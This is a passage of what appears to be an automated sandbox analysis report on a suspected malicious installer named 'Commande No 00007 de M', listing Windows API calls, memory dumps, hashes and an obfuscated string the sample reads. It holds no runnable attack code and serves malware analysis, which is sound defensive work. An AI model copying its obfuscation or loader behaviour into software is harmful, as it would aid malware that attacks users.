                                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00403204
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 4115351271-3512041753
                                                        • Opcode ID: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                        • Instruction ID: 96047f1703e1a12197270cf5e797561ca5ab02306a5825906e00d3d3d2912a57
                                                        • Opcode Fuzzy Hash: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                        • Instruction Fuzzy Hash: D8D0922160AD30A2D551372A3E0AFCF150C8F46769F118077F808760C24BAC5A8269FE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21de50892f659123e4fedba565e9e2413225c8e826dcfa90f57619bb85df476e
                                                        • Instruction ID: b3fba2513e78c155f0b266b50acf783dae1ce9585f0b47354f4c941ebe2136ae
                                                        • Opcode Fuzzy Hash: 21de50892f659123e4fedba565e9e2413225c8e826dcfa90f57619bb85df476e
                                                        • Instruction Fuzzy Hash: 76A13071E00229CBDF28CFA8C8447ADBBB1FB44305F15816AD816BB281D7789A96DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57f52ef8ebfd3b6830ca252784d29864a174ee9a5c8600b40a037bd56b74384a
                                                        • Instruction ID: 0388e715484a44d40d4ddbde005df80b94e1e5136e8ff3af7516764e2fd1b4f7
                                                        • Opcode Fuzzy Hash: 57f52ef8ebfd3b6830ca252784d29864a174ee9a5c8600b40a037bd56b74384a
                                                        • Instruction Fuzzy Hash: 0F913170E00229CBDF28CF98C8447ADBBB1FF44305F15816AD816BB281D778AA96DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec44333397786e712ce86ed3a064858ade4f3ed38e69d8951d19f407b84ebf46
                                                        • Instruction ID: e5fca131ad03ef0b1cae302aca876d249310e041a0af9db6593aad5c0906a822
                                                        • Opcode Fuzzy Hash: ec44333397786e712ce86ed3a064858ade4f3ed38e69d8951d19f407b84ebf46
                                                        • Instruction Fuzzy Hash: DA814571E04228CFDF24CFA8C8447ADBBB1FB45305F25816AD416BB281D7789A96DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52914874a4ae288a0090ad4813887b32842d8fe9a5a82c0860c7b0c89e61596f
                                                        • Instruction ID: 58d989ae5c12bcd237a7596d454377c992e25c5bcc6bbfe45bc07114c875b854
                                                        • Opcode Fuzzy Hash: 52914874a4ae288a0090ad4813887b32842d8fe9a5a82c0860c7b0c89e61596f
                                                        • Instruction Fuzzy Hash: 867113B1E04229CBDF28CF98C844BADBBF1FB44305F15816AD816BB281D7789996DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52544ba4eeb4024bb91b054a352ce2e9af5c1c52a3f63a0d20291f7e24db374d
                                                        • Instruction ID: ed3c1b2e2e9110b05ca1f1fb00e1e18bfdebd83ec129b9da7b835b7cf566ec6e
                                                        • Opcode Fuzzy Hash: 52544ba4eeb4024bb91b054a352ce2e9af5c1c52a3f63a0d20291f7e24db374d
                                                        • Instruction Fuzzy Hash: 7D712271E04229CFDF28CFA8C844BADBBB1FB44305F15816AD816BB281D7789996DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1ead19a7d6b18f14945d6ecc7a756aa80631c696357f52aa6e4b7da038a1b463
                                                        • Instruction ID: a58d0c8a3e5e471a1862abd912d582b465d9d5205f6115614135299ff5c3e34f
                                                        • Opcode Fuzzy Hash: 1ead19a7d6b18f14945d6ecc7a756aa80631c696357f52aa6e4b7da038a1b463
                                                        • Instruction Fuzzy Hash: F9714771E00229CBDF28CF98C8447ADBBB1FF44305F15806AD816BB281D7789956DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                                        • WriteFile.KERNELBASE(00000000,00412888,?,000000FF,00000000,00412888,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$PointerWrite
                                                        • String ID:
                                                        • API String ID: 539440098-0
                                                        • Opcode ID: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                        • Instruction ID: e6de339a950e3072e6bd285c0139ce9fe6f591fe0572f4373a504b9c05a9d2ef
                                                        • Opcode Fuzzy Hash: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                        • Instruction Fuzzy Hash: 42316970502259EBDF20DF55ED44A9E3BBCEB003A5F20803AF904E61D0D374DA40EBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                          • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                          • Part of subcall function 00404FC9: SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                          • Part of subcall function 00405491: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B6
                                                          • Part of subcall function 00405491: CloseHandle.KERNEL32(?), ref: 004054C3
                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 3521207402-0
                                                        • Opcode ID: 5c9000391534237a7d837c1e9581a0c0eef02dad9902a12460307e03ca68f42d
                                                        • Instruction ID: 6f705a643f824a2c918d297b47beca74151f8a63177eb59d1388921c388295f8
                                                        • Opcode Fuzzy Hash: 5c9000391534237a7d837c1e9581a0c0eef02dad9902a12460307e03ca68f42d
                                                        • Instruction Fuzzy Hash: DD016D71904118FBDF20AFA1CD459AE7B71EB00345F10857BFA01B51E1C3788A81DBAA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                                                        • RegCloseKey.KERNELBASE(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseOpenValue
                                                        • String ID:
                                                        • API String ID: 167947723-0
                                                        • Opcode ID: b48f0e00db685190992d590887bda2c11294440da915d161efab090941f01ef2
                                                        • Instruction ID: ea0f8bb5b2539548621220bc90554a9af61e98564e095efd323173a2c2703bf4
                                                        • Opcode Fuzzy Hash: b48f0e00db685190992d590887bda2c11294440da915d161efab090941f01ef2
                                                        • Instruction Fuzzy Hash: 57F081B2A04204FFE7119F659E8CEBF7A6CEB40748F10853EF441B62C0D6B95E41966A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00412888,Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT,004031C9,00409130,00409130,004030BB,00412888,00004000,?,00000000,?), ref: 004059FB
                                                        Strings
                                                        • Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT, xrefs: 004059E7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT
                                                        • API String ID: 2738559852-112686333
                                                        • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                        • Instruction ID: 267b57ffcffc4b39201858a503e5f4d445fc1ddc2041b1288b81c8d36a0eb731
                                                        • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                        • Instruction Fuzzy Hash: E6E0E632754199AFDF209E559C44EEB775CEB05350F004532FA15F3150D631E9219FA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
                                                        • RegCloseKey.KERNELBASE(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 554d3d18749224be1ffdffcdc3dcd0d8b1fddfaf5b0a3e68b09adb95bd2e3084
                                                        • Instruction ID: 3e5648d23b1537cbe7151ba7cdfd06ebb71b75e9977eff4765d7e8492c0e8cfe
                                                        • Opcode Fuzzy Hash: 554d3d18749224be1ffdffcdc3dcd0d8b1fddfaf5b0a3e68b09adb95bd2e3084
                                                        • Instruction Fuzzy Hash: A311C171905205EFDB11DF64CA889BEBBB4EF00344F20843FE441B62C0D2B84A41DB6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                        • Instruction ID: debc39b6c0c0c652093bc86d0143b21aa6e0fee53ad258223395c8adf4e96fc0
                                                        • Opcode Fuzzy Hash: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                        • Instruction Fuzzy Hash: 69012831724210ABE7294B789D04B6A3698FB10315F11853BF851F72F1D6B8DC029B5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteOpenValue
                                                        • String ID:
                                                        • API String ID: 849931509-0
                                                        • Opcode ID: 3a290400a623cc3eae9c3e5656087265b109e68777a4af8c05a58fc60a034409
                                                        • Instruction ID: 0b5143e1148f93cd965e23b4eca136ef14321d11ac2ad27151b5c1ea94f2786d
                                                        • Opcode Fuzzy Hash: 3a290400a623cc3eae9c3e5656087265b109e68777a4af8c05a58fc60a034409
                                                        • Instruction Fuzzy Hash: CAF06273A04111ABDB51BBF4DB8EAAE7268AB40318F14453BF501B71C1DAFC5E01A67E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 004050AB
                                                          • Part of subcall function 00404018: SendMessageA.USER32(000103F2,00000000,00000000,00000000), ref: 0040402A
                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
